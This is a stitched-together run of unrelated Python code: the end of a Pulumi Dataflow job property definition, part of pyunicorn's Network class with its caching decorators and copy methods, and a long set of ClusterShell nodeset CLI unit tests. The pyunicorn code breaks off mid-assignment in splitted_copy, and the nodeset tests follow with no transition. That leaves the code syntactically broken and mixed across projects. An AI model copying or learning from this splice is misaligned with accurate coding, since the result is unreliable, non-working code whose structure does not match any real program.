One of "drain" or "cancel". Specifies behavior of deletion during `pulumi destroy`. See above note.
"""
return pulumi.get(self, "on_delete")
@on_delete.setter
def on_delete(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "on_delete", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Key/Value pairs to be passed to the Dataflow job (as used in the template).
"""
return pulumi.get(self, "parameters")
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# This file is part of pyunicorn.
# Copyright (C) 2008--2017 <NAME> and pyunicorn authors
# URL: <http://www.pik-potsdam.de/members/donges/software>
# License: BSD (3-clause)
"""
Provides classes for analyzing spatially embedded complex networks, handling
multivariate data and generating time series surrogates.
"""
# general TODO:
# - find segfault problem in a.w. shortest path betweenness
# - rename aw... to nsi... (node splitting invariant)
# - implement "corrected" node splitting invariant measures named cnsi...
# (see paper)
# - implement Newman modularity and iterative division
# - treat type-related ambiguities more thoroughly
# (flatten(), list(...), astype(...) etc.)
#
# Import essential packages
#
import sys # performance testing
import time
from functools import wraps # helper function for decorators
import numpy as np # array object and fast numerics
from numpy import random
from scipy import linalg # solvers
from scipy.linalg import matfuncs
from scipy import sparse as sp # fast sparse matrices
from scipy.sparse.linalg import eigsh, inv, splu
import igraph # high performance graph theory tools
from ..utils import progressbar # easy progress bar handling
from .. import mpi # parallelized computations
from pyunicorn.core._ext.numerics import _local_cliquishness_4thorder, \
_local_cliquishness_5thorder, _cy_mpi_nsi_newman_betweenness, \
_cy_mpi_newman_betweenness, _nsi_betweenness, _higher_order_transitivity4,\
_newman_betweenness_badly_cython, _do_nsi_clustering_I, \
_do_nsi_clustering_II, _do_nsi_hamming_clustering
def nz_coords(matrix):
"""
Find coordinates of all non-zero entries in a sparse matrix.
:return: list of coordinates [row,col]
:rtype: array([[int>=0,int>=0]])
"""
return np.array(matrix.nonzero()).T
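# Illustrative (hypothetical) use of nz_coords; the exact row order depends on
# the sparse format, and the values here are for demonstration only:
#
#     m = sp.lil_matrix((3, 3))
#     m[0, 1] = 1
#     m[2, 0] = 1
#     nz_coords(m)   # -> array([[0, 1], [2, 0]])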
def cache_helper(self, cat, key, msg, func, *args, **kwargs):
"""
Cache result of a function in a subdict of :attr:`self.cache`.
:arg str cat: cache category
:arg str key: cache key
:arg str msg: message to be displayed during first calculation
:arg func func: function to be cached
"""
# categories can be added on the fly?!?!
self.cache.setdefault(cat, {})
if self.cache[cat].setdefault(key) is None:
if msg is not None and self.silence_level <= 1:
print 'Calculating ' + msg + '...'
self.cache[cat][key] = func(self, *args, **kwargs)
return self.cache[cat][key]
def cached_const(cat, key, msg=None):
"""
Cache result of decorated method in a fixed subdict of :attr:`self.cache`.
"""
def wrapper(func):
@wraps(func)
def wrapped(self, *args, **kwargs):
return cache_helper(self, cat, key, msg, func, *args, **kwargs)
return wrapped
return wrapper
def cached_var(cat, msg=None):
"""
Cache result of decorated method in a variable subdict of
:attr:`self.cache`, specified as first argument to the decorated method.
"""
def wrapper(func):
@wraps(func)
def wrapped(self, key=None, **kwargs):
return cache_helper(self, cat, key, msg, func, key, **kwargs)
return wrapped
return wrapper
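# Illustrative (hypothetical) use of the caching decorators above; the method
# name and category below are made up for demonstration only:
#
#     class SomeNetwork(Network):
#         @cached_const('base', 'n_links_squared', 'squared link count')
#         def n_links_squared(self):
#             return self.n_links ** 2
#
# The first call computes the value and stores it under
# self.cache['base']['n_links_squared']; subsequent calls return the cached
# value until clear_cache() is called.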
class NetworkError(Exception):
"""
Used for all exceptions raised by Network.
"""
def __init__(self, value):
Exception.__init__(self)
self.value = value
def __str__(self):
return repr(self.value)
#
# Define class Network
#
class Network(object):
"""
A Network is a simple, undirected or directed graph with optional node
and/or link weights. This class encapsulates data structures and methods to
represent, generate and analyze such structures.
Network relies on the package igraph for many of its features, but also
implements new functionality. Highlights include weighted and directed
statistical network measures, measures based on random walks, and
node splitting invariant network measures.
**Examples:**
Create an undirected network given the adjacency matrix:
>>> net = Network(adjacency=[[0,1,0,0,0,0], [1,0,1,0,0,1],
... [0,1,0,1,1,0], [0,0,1,0,1,0],
... [0,0,1,1,0,1], [0,1,0,0,1,0]])
Create an Erdos-Renyi random graph:
>>> net = Network.ErdosRenyi(n_nodes=100, link_probability=0.05)
Generating Erdos-Renyi random graph with 100 nodes and probability 0.05...
"""
#
# Definitions of internal methods
#
def __init__(self, adjacency=None, edge_list=None, directed=False,
node_weights=None, silence_level=0):
"""
Return a new directed or undirected Network object
with given adjacency matrix and optional node weights.
:type adjacency: square array-like [node,node], or pysparse matrix of
0s and 1s
:arg adjacency: Adjacency matrix of the new network. Entry [i,j]
indicates whether node i links to node j. Its diagonal must be
zero. Must be symmetric if directed=False.
:type edge_list: array-like list of lists
:arg edge_list: Edge list of the new network. Entries [i,0], [i,1]
contain the end-nodes of an edge.
:arg bool directed: Indicates whether the network shall be considered
as directed. If False, adjacency must be symmetric.
:type node_weights: 1d numpy array or list [node] of floats >= 0
:arg node_weights: Optional array or list of node weights to be used
for node splitting invariant network measures. Entry [i] is the
weight of node i. (Default: list of ones)
:type silence_level: int >= 0
:arg silence_level: The higher, the less progress info is output.
:rtype: :class:`Network` instance
:return: The new network.
"""
self.directed = directed
"""(bool) Indicates whether the network is directed."""
self.silence_level = silence_level
"""(int>=0) higher -> less progress info"""
self.N = 0
"""(int>0) number of nodes"""
self.n_links = 0
"""(int>0) number of links"""
self.link_density = 0
"""(0<float<1) proportion of linked node pairs"""
self.sp_A = None
"""(sparse.csc_matrix([[int,int]]) with entries 0,1)
Adjacency matrix. A[i,j]=1 indicates a link i -> j. Symmetric if the
network is undirected."""
self.sp_dtype = None
self.graph = None
"""(igraph.Graph) Embedded graph object providing some standard network
measures."""
self._node_weights = None
"""(array([int>=0])) array of node weights"""
self.mean_node_weight = 0
"""mean node weight"""
self.total_node_weight = 0
"""total node weight"""
self.cache = {'base': {}, 'nsi': {}, 'paths': {}}
"""(dict) cache of re-usable computation results"""
if adjacency is not None:
self._set_adjacency(adjacency)
elif edge_list is not None:
self.set_edge_list(edge_list)
else:
raise NetworkError("An adjacency matrix or edge list has to be " +
"given to initialize an instance of Network.")
self._set_node_weights(node_weights)
self.degree()
def __str__(self):
"""
Return a short summary of the network.
**Example:**
>>> print Network.SmallTestNetwork()
Network: undirected, 6 nodes, 7 links, link density 0.467.
:rtype: string
"""
return ('Network: %sdirected, %i nodes, %i links, ' +
'link density %.3f.') % ('' if self.directed else 'un', self.N,
self.n_links, self.link_density)
def __len__(self):
"""
Return the number of nodes as the 'length'.
**Example:**
>>> len(Network.SmallTestNetwork())
6
:rtype: int > 0
"""
return self.N
def clear_cache(self):
"""
Clear cache of information that can be recalculated from basic data.
"""
self.cache['base'] = {}
self.clear_nsi_cache()
self.clear_paths_cache()
def clear_nsi_cache(self):
"""
Clear cache of information that can be recalculated from basic data
and depends on the node weights.
"""
self.cache['nsi'] = {}
def clear_paths_cache(self):
"""
Clear cache of path lengths for link attributes.
"""
for attr in self.cache['paths']:
self.clear_link_attribute(attr)
self.cache['paths'] = {}
def copy(self):
"""
Return a copy of the network.
"""
return Network(adjacency=self.sp_A, directed=self.directed,
node_weights=self.node_weights,
silence_level=self.silence_level)
def undirected_copy(self):
"""
Return an undirected copy of the network.
Nodes i and j are linked in the copy if, in the current network, i
links to j or j links to i or both.
**Example:**
>>> net = Network(adjacency=[[0,1],[0,0]], directed=True); print net
Network: directed, 2 nodes, 1 links, link density 0.500.
>>> print net.undirected_copy()
Network: undirected, 2 nodes, 1 links, link density 1.000.
:rtype: :class:`Network` instance
"""
return Network(adjacency=self.undirected_adjacency(),
directed=False, node_weights=self.node_weights,
silence_level=self.silence_level)
def permuted_copy(self, permutation):
"""
Return a copy of the network with node numbers rearranged. This
operation should not change topological information and network
measures.
:type permutation: array-like [int]
:arg permutation: desired permutation of nodes
:rtype: :class:`Network` instance
"""
idx = np.array(permutation)
if sorted(idx) != range(self.N):
raise NetworkError("Incorrect permutation indices!")
return Network(adjacency=self.sp_A[idx][:, idx],
node_weights=self.node_weights[idx],
directed=self.directed,
silence_level=self.silence_level)
def splitted_copy(self, node=-1, proportion=0.5):
"""
Return a copy of the network with one node split in two.
The specified node is split into two interlinked nodes
which are linked to the same nodes as the original node,
and its weight is divided between them according to the given proportion.
(This method is useful for testing the node splitting invariance
of measures, since an n.s.i. measure will be the same before and after
the split.)
**Example:**
>>> net = Network.SmallTestNetwork(); print net
Network: undirected, 6 nodes, 7 links, link density 0.467.
>>> net2 = net.splitted_copy(node=5, proportion=0.2); print net2
Network: undirected, 7 nodes, 9 links, link density 0.429.
>>> print net.node_weights; print net2.node_weights
[ 1.5 1.7 1.9 2.1 2.3 2.5]
[ 1.5 1.7 1.9 2.1 2.3 2. 0.5]
:type node: int
:arg node: The index of the node to be split. If negative,
N + index is used. The new node gets index N. (Default: -1)
:type proportion: float from 0 to 1
:arg proportion: The split node gets a new weight of
(1-proportion) * (weight of the original node),
and the new node gets a weight of
proportion * (weight of the original node).
(Default: 0.5)
:rtype: :class:`Network`
"""
N, A, w = self.N,
self._nodeset_t(["--fold", "-i", "bar[0-5]"], "foo[6-10]\n", "\n")
self._nodeset_t(["--fold", "-i", "foo[5-10,15]"], "foo[0-10]\nfoo[13-18]\n", "foo[5-10,15]\n")
# using stdin for -i
self._nodeset_t(["-f","foo[1-6]","-i","-"], "foo4 foo5 foo6\n", "foo[4-6]\n")
self._nodeset_t(["-f","-i","-","foo[1-6]"], "foo4 foo5 foo6\n", "foo[1-6]\n")
# numerical bracket folding (#228)
self._nodeset_t(["--fold", "-i", "node123[1-2]"], "node1232\n", "node1232\n")
self._nodeset_t(["--fold", "-i", "node023[1-2]0"], "node02320\n", "node02320\n")
self._nodeset_t(["--fold", "-i", "node023[1-2]0-ipmi2"], "node02320-ipmi2\n", "node02320-ipmi2\n")
def test_015_rangeset(self):
"""test nodeset --rangeset"""
self._nodeset_t(["--fold","--rangeset","1,2"], None, "1-2\n")
self._nodeset_t(["--expand","-R","1-2"], None, "1 2\n")
self._nodeset_t(["--fold","-R","1-2","-X","2-3"], None, "1,3\n")
def test_016_rangeset_stdin(self):
"""test nodeset --rangeset (stdin)"""
self._nodeset_t(["--fold","--rangeset"], "1,2\n", "1-2\n")
self._nodeset_t(["--expand","-R"], "1-2\n", "1 2\n")
self._nodeset_t(["--fold","-R","-X","2-3"], "1-2\n", "1,3\n")
def test_017_stdin(self):
"""test nodeset - (stdin)"""
self._nodeset_t(["-f","-"], "foo\n", "foo\n")
self._nodeset_t(["-f","-"], "foo1 foo2 foo3\n", "foo[1-3]\n")
self._nodeset_t(["--autostep=2", "-f"], "foo0 foo2 foo4 foo6\n", "foo[0-6/2]\n")
self._nodeset_t(["--autostep=auto", "-f"], "foo0 foo2 foo4 foo6\n", "foo[0-6/2]\n")
self._nodeset_t(["--autostep=100%", "-f"], "foo0 foo2 foo4 foo6\n", "foo[0-6/2]\n")
self._nodeset_t(["--autostep=0%", "-f"], "foo0 foo2 foo4 foo6\n", "foo[0-6/2]\n")
def test_018_split(self):
"""test nodeset --split"""
self._nodeset_t(["--split=2","-f", "bar"], None, "bar\n")
self._nodeset_t(["--split", "2","-f", "foo,bar"], None, "bar\nfoo\n")
self._nodeset_t(["--split", "2","-e", "foo", "bar", "bur", "oof", "gcc"], None, "bar bur foo\ngcc oof\n")
self._nodeset_t(["--split=2","-f", "foo[2-9]"], None, "foo[2-5]\nfoo[6-9]\n")
self._nodeset_t(["--split=2","-f", "foo[2-3,7]", "bar9"], None, "bar9,foo2\nfoo[3,7]\n")
self._nodeset_t(["--split=3","-f", "foo[2-9]"], None, "foo[2-4]\nfoo[5-7]\nfoo[8-9]\n")
self._nodeset_t(["--split=1","-f", "foo2", "foo3"], None, "foo[2-3]\n")
self._nodeset_t(["--split=4","-f", "foo[2-3]"], None, "foo2\nfoo3\n")
self._nodeset_t(["--split=4","-f", "foo3", "foo2"], None, "foo2\nfoo3\n")
self._nodeset_t(["--split=2","-e", "foo[2-9]"], None, "foo2 foo3 foo4 foo5\nfoo6 foo7 foo8 foo9\n")
self._nodeset_t(["--split=3","-e", "foo[2-9]"], None, "foo2 foo3 foo4\nfoo5 foo6 foo7\nfoo8 foo9\n")
self._nodeset_t(["--split=1","-e", "foo3", "foo2"], None, "foo2 foo3\n")
self._nodeset_t(["--split=4","-e", "foo[2-3]"], None, "foo2\nfoo3\n")
self._nodeset_t(["--split=4","-e", "foo2", "foo3"], None, "foo2\nfoo3\n")
self._nodeset_t(["--split=2","-c", "foo2", "foo3"], None, "1\n1\n")
def test_019_contiguous(self):
"""test nodeset --contiguous"""
self._nodeset_t(["--contiguous", "-f", "bar"], None, "bar\n")
self._nodeset_t(["--contiguous", "-f", "foo,bar"], None, "bar\nfoo\n")
self._nodeset_t(["--contiguous", "-f", "foo", "bar", "bur", "oof", "gcc"], None, "bar\nbur\nfoo\ngcc\noof\n")
self._nodeset_t(["--contiguous", "-e", "foo", "bar", "bur", "oof", "gcc"], None, "bar\nbur\nfoo\ngcc\noof\n")
self._nodeset_t(["--contiguous", "-f", "foo2"], None, "foo2\n")
self._nodeset_t(["--contiguous", "-R", "-f", "2"], None, "2\n")
self._nodeset_t(["--contiguous", "-f", "foo[2-9]"], None, "foo[2-9]\n")
self._nodeset_t(["--contiguous", "-f", "foo[2-3,7]", "bar9"], None, "bar9\nfoo[2-3]\nfoo7\n")
self._nodeset_t(["--contiguous", "-R", "-f", "2-3,7", "9"], None, "2-3\n7\n9\n")
self._nodeset_t(["--contiguous", "-f", "foo2", "foo3"], None, "foo[2-3]\n")
self._nodeset_t(["--contiguous", "-f", "foo3", "foo2"], None, "foo[2-3]\n")
self._nodeset_t(["--contiguous", "-f", "foo3", "foo1"], None, "foo1\nfoo3\n")
self._nodeset_t(["--contiguous", "-f", "foo[1-5/2]", "foo7"], None, "foo1\nfoo3\nfoo5\nfoo7\n")
def test_020_slice(self):
"""test nodeset -I/--slice"""
self._nodeset_t(["--slice=0","-f", "bar"], None, "bar\n")
self._nodeset_t(["--slice=0","-e", "bar"], None, "bar\n")
self._nodeset_t(["--slice=1","-f", "bar"], None, "\n")
self._nodeset_t(["--slice=0-1","-f", "bar"], None, "bar\n")
self._nodeset_t(["-I0","-f", "bar[34-68,89-90]"], None, "bar34\n")
self._nodeset_t(["-R", "-I0","-f", "34-68,89-90"], None, "34\n")
self._nodeset_t(["-I 0","-f", "bar[34-68,89-90]"], None, "bar34\n")
self._nodeset_t(["-I 0","-e", "bar[34-68,89-90]"], None, "bar34\n")
self._nodeset_t(["-I 0-3","-f", "bar[34-68,89-90]"], None, "bar[34-37]\n")
self._nodeset_t(["-I 0-3","-f", "bar[34-68,89-90]", "-x", "bar34"], None, "bar[35-38]\n")
self._nodeset_t(["-I 0-3","-f", "bar[34-68,89-90]", "-x", "bar35"], None, "bar[34,36-38]\n")
self._nodeset_t(["-I 0-3","-e", "bar[34-68,89-90]"], None, "bar34 bar35 bar36 bar37\n")
self._nodeset_t(["-I 3,1,0,2","-f", "bar[34-68,89-90]"], None, "bar[34-37]\n")
self._nodeset_t(["-I 1,3,7,10,16,20,30,34-35,37","-f", "bar[34-68,89-90]"], None, "bar[35,37,41,44,50,54,64,68,89]\n")
self._nodeset_t(["-I 8","-f", "bar[34-68,89-90]"], None, "bar42\n")
self._nodeset_t(["-I 8-100","-f", "bar[34-68,89-90]"], None, "bar[42-68,89-90]\n")
self._nodeset_t(["-I 0-100","-f", "bar[34-68,89-90]"], None, "bar[34-68,89-90]\n")
self._nodeset_t(["-I 8-100/2","-f", "bar[34-68,89-90]"], None, "bar[42,44,46,48,50,52,54,56,58,60,62,64,66,68,90]\n")
self._nodeset_t(["--autostep=2", "-I 8-100/2","-f", "bar[34-68,89-90]"], None, "bar[42-68/2,90]\n")
self._nodeset_t(["--autostep=93%", "-I 8-100/2","-f", "bar[34-68,89-90]"], None, "bar[42-68/2,90]\n")
self._nodeset_t(["--autostep=94%", "-I 8-100/2","-f", "bar[34-68,89-90]"], None, "bar[42,44,46,48,50,52,54,56,58,60,62,64,66,68,90]\n")
self._nodeset_t(["--autostep=auto", "-I 8-100/2","-f", "bar[34-68,89-90]"], None, "bar[42,44,46,48,50,52,54,56,58,60,62,64,66,68,90]\n")
self._nodeset_t(["--autostep=auto", "-I 8-100/2","-f", "bar[34-68]"], None, "bar[42-68/2]\n")
self._nodeset_t(["--autostep=100%", "-I 8-100/2","-f", "bar[34-68]"], None, "bar[42-68/2]\n")
def test_021_slice_stdin(self):
"""test nodeset -I/--slice (stdin)"""
self._nodeset_t(["--slice=0","-f"], "bar\n", "bar\n")
self._nodeset_t(["--slice=0","-e"], "bar\n", "bar\n")
self._nodeset_t(["--slice=1","-f"], "bar\n", "\n")
self._nodeset_t(["--slice=0-1","-f"], "bar\n", "bar\n")
self._nodeset_t(["-I0","-f"], "bar[34-68,89-90]\n", "bar34\n")
self._nodeset_t(["-R", "-I0","-f"], "34-68,89-90\n", "34\n")
self._nodeset_t(["-I 0","-f"], "bar[34-68,89-90]\n", "bar34\n")
self._nodeset_t(["-I 0","-e"], "bar[34-68,89-90]\n", "bar34\n")
self._nodeset_t(["-I 0-3","-f"], "bar[34-68,89-90]\n", "bar[34-37]\n")
self._nodeset_t(["-I 0-3","-f", "-x", "bar34"], "bar[34-68,89-90]\n", "bar[35-38]\n")
self._nodeset_t(["-I 0-3","-f", "-x", "bar35"], "bar[34-68,89-90]\n", "bar[34,36-38]\n")
self._nodeset_t(["-I 0-3","-e"], "bar[34-68,89-90]\n", "bar34 bar35 bar36 bar37\n")
self._nodeset_t(["-I 3,1,0,2","-f"], "bar[34-68,89-90]\n", "bar[34-37]\n")
self._nodeset_t(["-I 1,3,7,10,16,20,30,34-35,37","-f"], "bar[34-68,89-90]\n", "bar[35,37,41,44,50,54,64,68,89]\n")
self._nodeset_t(["-I 8","-f"], "bar[34-68,89-90]\n", "bar42\n")
self._nodeset_t(["-I 8-100","-f"], "bar[34-68,89-90]\n", "bar[42-68,89-90]\n")
self._nodeset_t(["-I 0-100","-f"], "bar[34-68,89-90]\n", "bar[34-68,89-90]\n")
self._nodeset_t(["-I 8-100/2","-f"], "bar[34-68,89-90]\n", "bar[42,44,46,48,50,52,54,56,58,60,62,64,66,68,90]\n")
self._nodeset_t(["--autostep=2", "-I 8-100/2","-f"], "bar[34-68,89-90]\n", "bar[42-68/2,90]\n")
self._nodeset_t(["--autostep=93%", "-I 8-100/2","-f"], "bar[34-68,89-90]\n", "bar[42-68/2,90]\n")
self._nodeset_t(["--autostep=93.33%", "-I 8-100/2","-f"], "bar[34-68,89-90]\n", "bar[42-68/2,90]\n")
self._nodeset_t(["--autostep=94%", "-I 8-100/2","-f"], "bar[34-68,89-90]\n", "bar[42,44,46,48,50,52,54,56,58,60,62,64,66,68,90]\n")
self._nodeset_t(["--autostep=auto", "-I 8-100/2","-f"], "bar[34-68,89-90]\n", "bar[42,44,46,48,50,52,54,56,58,60,62,64,66,68,90]\n")
self._nodeset_t(["--autostep=2", "-I 8-100/2","-f"], "bar[34-68]\n", "bar[42-68/2]\n")
def test_022_output_format(self):
"""test nodeset -O"""
self._nodeset_t(["--expand", "--output-format", "/path/%s/", "foo"], None, "/path/foo/\n")
self._nodeset_t(["--expand", "-O", "/path/%s/", "-S", ":", "foo"], None, "/path/foo/\n")
self._nodeset_t(["--expand", "-O", "/path/%s/", "foo[2]"], None, "/path/foo2/\n")
self._nodeset_t(["--expand", "-O", "%s-ib0", "foo[1-4]"], None, "foo1-ib0 foo2-ib0 foo3-ib0 foo4-ib0\n")
self._nodeset_t(["--expand", "-O", "%s-ib0", "-S", ":", "foo[1-4]"], None, "foo1-ib0:foo2-ib0:foo3-ib0:foo4-ib0\n")
self._nodeset_t(["--fold", "-O", "%s-ib0", "foo1", "foo2"], None, "foo[1-2]-ib0\n")
self._nodeset_t(["--count", "-O", "result-%s", "foo1", "foo2"], None, "result-2\n")
self._nodeset_t(["--contiguous", "-O", "%s-ipmi", "-f", "foo[2-3,7]", "bar9"], None, "bar9-ipmi\nfoo[2-3]-ipmi\nfoo7-ipmi\n")
self._nodeset_t(["--split=2", "-O", "%s-ib", "-e", "foo[2-9]"], None, "foo2-ib foo3-ib foo4-ib foo5-ib\nfoo6-ib foo7-ib foo8-ib foo9-ib\n")
self._nodeset_t(["--split=3", "-O", "hwm-%s", "-f", "foo[2-9]"], None, "hwm-foo[2-4]\nhwm-foo[5-7]\nhwm-foo[8-9]\n")
self._nodeset_t(["-I0", "-O", "{%s}", "-f", "bar[34-68,89-90]"], None, "{bar34}\n")
# RangeSet mode (-R)
self._nodeset_t(["--fold", "-O", "{%s}", "--rangeset", "1,2"], None, "{1-2}\n")
self._nodeset_t(["--expand", "-O", "{%s}", "-R","1-2"], None, "{1} {2}\n")
self._nodeset_t(["--fold", "-O", "{%s}", "-R","1-2","-X","2-3"], None, "{1,3}\n")
self._nodeset_t(["--fold", "-O", "{%s}", "-S", ":", "--rangeset", "1,2"], None, "{1-2}\n")
self._nodeset_t(["--expand", "-O", "{%s}", "-S", ":", "-R","1-2"], None, "{1}:{2}\n")
self._nodeset_t(["--fold", "-O", "{%s}", "-S", ":", "-R","1-2","-X","2-3"], None, "{1,3}\n")
self._nodeset_t(["-R", "-I0", "-O", "{%s}", "-f", "34-68,89-90"], None, "{34}\n")
def test_023_axis(self):
"""test nodeset folding with --axis"""
self._nodeset_t(["--axis=0","-f", "bar"], None, "bar\n")
self._nodeset_t(["--axis=1","-f", "bar"], None, "bar\n")
self._nodeset_t(["--axis=1","-R","-f", "1,2,3"], None, None, 2,
"--axis option is only supported when folding nodeset\n")
self._nodeset_t(["--axis=1","-e", "bar"], None, None, 2,
"--axis option is only supported when folding nodeset\n")
# 1D and 2D nodeset: fold along axis 0 only
self._nodeset_t(["--axis=1","-f", "comp-[1-2]-[1-3],login-[1-2]"], None,
'comp-[1-2]-1,comp-[1-2]-2,comp-[1-2]-3,login-[1-2]\n')
# 1D and 2D nodeset: fold along axis 1 only
self._nodeset_t(["--axis=2","-f", "comp-[1-2]-[1-3],login-[1-2]"], None,
'comp-1-[1-3],comp-2-[1-3],login-1,login-2\n')
# 1D and 2D nodeset: fold along last axis only
self._nodeset_t(["--axis=-1","-f", "comp-[1-2]-[1-3],login-[1-2]"], None,
'comp-1-[1-3],comp-2-[1-3],login-[1-2]\n')
# test for a common case
ndnodes = []
for ib in range(2):
for idx in range(500):
ndnodes.append("node%d-ib%d" % (idx, ib))
random.shuffle(ndnodes)
self._nodeset_t(["--axis=1","-f"] + ndnodes, None,
"node[0-499]-ib0,node[0-499]-ib1\n")
exp_result = []
for idx in range(500):
exp_result.append("node%d-ib[0-1]" % idx)
self._nodeset_t(["--axis=2","-f"] + ndnodes, None,
','.join(exp_result) + '\n')
# 4D test
ndnodes = ["c-1-2-3-4", "c-2-2-3-4", "c-3-2-3-4", "c-5-5-5-5",
"c-5-7-5-5", "c-5-9-5-5", "c-5-11-5-5", "c-9-8-8-08",
"c-9-8-8-09"]
self._nodeset_t(["--axis=1","-f"] + ndnodes, None,
"c-5-5-5-5,c-5-7-5-5,c-5-9-5-5,c-5-11-5-5,c-[1-3]-2-3-4,c-9-8-8-08,c-9-8-8-09\n")
self._nodeset_t(["--axis=2","-f"] + ndnodes, None,
"c-5-[5,7,9,11]-5-5,c-1-2-3-4,c-2-2-3-4,c-3-2-3-4,c-9-8-8-08,c-9-8-8-09\n")
self._nodeset_t(["--axis=3","-f"] + ndnodes, None,
"c-5-5-5-5,c-5-7-5-5,c-5-9-5-5,c-5-11-5-5,c-1-2-3-4,c-2-2-3-4,c-3-2-3-4,c-9-8-8-08,c-9-8-8-09\n")
self._nodeset_t(["--axis=4","-f"] + ndnodes, None,
"c-5-5-5-5,c-5-7-5-5,c-5-9-5-5,c-5-11-5-5,c-1-2-3-4,c-2-2-3-4,c-3-2-3-4,c-9-8-8-[08-09]\n")
self._nodeset_t(["--axis=1-2","-f"] + ndnodes, None,
"c-5-[5,7,9,11]-5-5,c-[1-3]-2-3-4,c-9-8-8-08,c-9-8-8-09\n")
self._nodeset_t(["--axis=2-3","-f"] + ndnodes, None,
"c-5-[5,7,9,11]-5-5,c-1-2-3-4,c-2-2-3-4,c-3-2-3-4,c-9-8-8-08,c-9-8-8-09\n")
self._nodeset_t(["--axis=3-4","-f"] + ndnodes, None,
"c-5-5-5-5,c-5-7-5-5,c-5-9-5-5,c-5-11-5-5,c-1-2-3-4,c-2-2-3-4,c-3-2-3-4,c-9-8-8-[08-09]\n")
self._nodeset_t(["--axis=1-3","-f"] + ndnodes, None,
"c-5-[5,7,9,11]-5-5,c-[1-3]-2-3-4,c-9-8-8-08,c-9-8-8-09\n")
self._nodeset_t(["--axis=2-4","-f"] + ndnodes, None,
"c-5-[5,7,9,11]-5-5,c-1-2-3-4,c-2-2-3-4,c-3-2-3-4,c-9-8-8-[08-09]\n")
self._nodeset_t(["--axis=1-4","-f"] + ndnodes, None,
"c-5-[5,7,9,11]-5-5,c-[1-3]-2-3-4,c-9-8-8-[08-09]\n")
self._nodeset_t(["-f"] + ndnodes, None,
"c-5-[5,7,9,11]-5-5,c-[1-3]-2-3-4,c-9-8-8-[08-09]\n")
# a case where axis and autostep are working
self._nodeset_t(["--autostep=4", "--axis=1-2","-f"] + ndnodes, None,
"c-5-[5-11/2]-5-5,c-[1-3]-2-3-4,c-9-8-8-08,c-9-8-8-09\n")
def test_024_axis_stdin(self):
"""test nodeset folding with --axis (stdin)"""
self._nodeset_t(["--axis=0","-f"], "bar\n", "bar\n")
self._nodeset_t(["--axis=1","-f"], "bar\n", "bar\n")
self._nodeset_t(["--axis=1","-R","-f"], "1,2,3", None, 2,
"--axis option is only supported when folding nodeset\n")
self._nodeset_t(["--axis=1","-e"], "bar\n", None, 2,
"--axis option is only supported when folding nodeset\n")
# 1D and 2D nodeset: fold along the first axis (--axis=1) only
self._nodeset_t(["--axis=1","-f"], "comp-[1-2]-[1-3],login-[1-2]\n",
'comp-[1-2]-1,comp-[1-2]-2,comp-[1-2]-3,login-[1-2]\n')
# 1D and 2D nodeset: fold along the second axis (--axis=2) only
self._nodeset_t(["--axis=2","-f"], "comp-[1-2]-[1-3],login-[1-2]\n",
'comp-1-[1-3],comp-2-[1-3],login-1,login-2\n')
# 1D and 2D nodeset: fold along last axis only
self._nodeset_t(["--axis=-1","-f"], "comp-[1-2]-[1-3],login-[1-2]\n",
'comp-1-[1-3],comp-2-[1-3],login-[1-2]\n')
# test for a common case
ndnodes = []
for ib in range(2):
for idx in range(500):
ndnodes.append("node%d-ib%d" % (idx, ib))
random.shuffle(ndnodes)
self._nodeset_t(["--axis=1","-f"], '\n'.join(ndnodes) + '\n',
"node[0-499]-ib0,node[0-499]-ib1\n")
exp_result = []
for idx in range(500):
exp_result.append("node%d-ib[0-1]" % idx)
self._nodeset_t(["--axis=2","-f"], '\n'.join(ndnodes) + '\n',
','.join(exp_result) + '\n')
class CLINodesetGroupResolverTest1(CLINodesetTestBase):
"""Unit test class for testing CLI/Nodeset.py with custom Group Resolver"""
def setUp(self):
# Special tests that require a default group source set
f = make_temp_file("""
[Main]
default: local
[local]
map: echo example[1-100]
all: echo example[1-1000]
list: echo foo bar moo
""")
set_std_group_resolver(GroupResolverConfig(f.name))
def tearDown(self):
set_std_group_resolver(None)
def test_022_list(self):
"""test nodeset --list"""
self._nodeset_t(["--list"], None, "@bar\n@foo\n@moo\n")
self._nodeset_t(["-ll"], None, "@bar example[1-100]\n@foo example[1-100]\n@moo example[1-100]\n")
self._nodeset_t(["-lll"], None, "@bar example[1-100] 100\n@foo example[1-100] 100\n@moo example[1-100] 100\n")
self._nodeset_t(["-l", "example[4,95]", "example5"], None, "@moo\n@bar\n@foo\n")
self._nodeset_t(["-ll", "example[4,95]", "example5"], None, "@moo example[4-5,95]\n@bar example[4-5,95]\n@foo example[4-5,95]\n")
self._nodeset_t(["-lll", "example[4,95]", "example5"], None, "@moo example[4-5,95] 3/100\n@bar example[4-5,95] 3/100\n@foo example[4-5,95] 3/100\n")
# test empty result
self._nodeset_t(["-l", "foo[3-70]", "bar6"], None, "")
# more arg-mixed tests
self._nodeset_t(["-a", "-l"], None, "@moo\n@bar\n@foo\n")
self._nodeset_t(["-a", "-l", "-x example[1-100]"], None, "")
self._nodeset_t(["-a", "-l", "-x example[1-40]"], None, "@moo\n@bar\n@foo\n")
self._nodeset_t(["-l", "-x example3"], None, "") # no -a, remove from nothing
self._nodeset_t(["-l", "-i example3"], None, "") # no -a, intersect from nothing
self._nodeset_t(["-l", "-X example3"], None, "@moo\n@bar\n@foo\n") # no -a, xor from nothing
self._nodeset_t(["-l", "-", "-i example3"], "example[3,500]\n", "@moo\n@bar\n@foo\n")
def test_023_list_all(self):
"""test nodeset --list-all"""
self._nodeset_t(["--list-all"], None, "@bar\n@foo\n@moo\n")
self._nodeset_t(["-L"], None, "@bar\n@foo\n@moo\n")
self._nodeset_t(["-LL"], None, "@bar example[1-100]\n@foo example[1-100]\n@moo example[1-100]\n")
self._nodeset_t(["-LLL"], None, "@bar example[1-100] 100\n@foo example[1-100] 100\n@moo example[1-100] 100\n")
class CLINodesetGroupResolverTest2(CLINodesetTestBase):
"""Unit test class for testing CLI/Nodeset.py with custom Group Resolver"""
def setUp(self):
# Special tests that require a default group source set
f = make_temp_file("""
[Main]
default: test
[test]
map: echo example[1-100]
all: echo @foo,@bar,@moo
list: echo foo bar moo
[other]
map: echo nova[030-489]
all: echo @baz,@qux,@norf
list: echo baz qux norf
""")
set_std_group_resolver(GroupResolverConfig(f.name))
def tearDown(self):
set_std_group_resolver(None)
def test_024_groups(self):
